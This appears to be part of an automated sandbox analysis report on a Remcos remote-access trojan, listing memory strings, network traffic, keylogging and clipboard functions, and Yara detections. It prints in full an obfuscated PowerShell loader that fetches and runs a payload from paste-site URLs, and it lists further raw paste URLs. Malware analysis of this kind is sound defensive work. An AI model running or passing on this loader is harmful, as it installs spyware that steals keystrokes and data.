                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.o
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A87B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Rrk2f/0
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/4B83LcVU
                    Source: powershell.exe, 00000003.00000002.1885223131.0000026023A98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1947421542.000002603DC62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886411782.0000026023CA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/J6uRjZrv
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026027201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/shqm6g9p/raw
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/shqm6g9p/rawP
                    Source: powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/vsm4ofxs/raw
                    Source: powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/vsm4ofxs/rawp
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000008_2_0040A2F3
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0040A41B
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041CA6D SystemParametersInfoW,8_2_0041CA6D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041CA73 SystemParametersInfoW,8_2_0041CA73

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9840E03_2_00007FFD9B9840E0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BA414933_2_00007FFD9BA41493
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043706A8_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004140058_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043E11C8_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004541D98_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004381E88_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041F18B8_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004462708_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043E34B8_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004533AB8_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0042742E8_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004375668_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043E5A88_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004387F08_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043797E8_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004339D78_2_004339D7
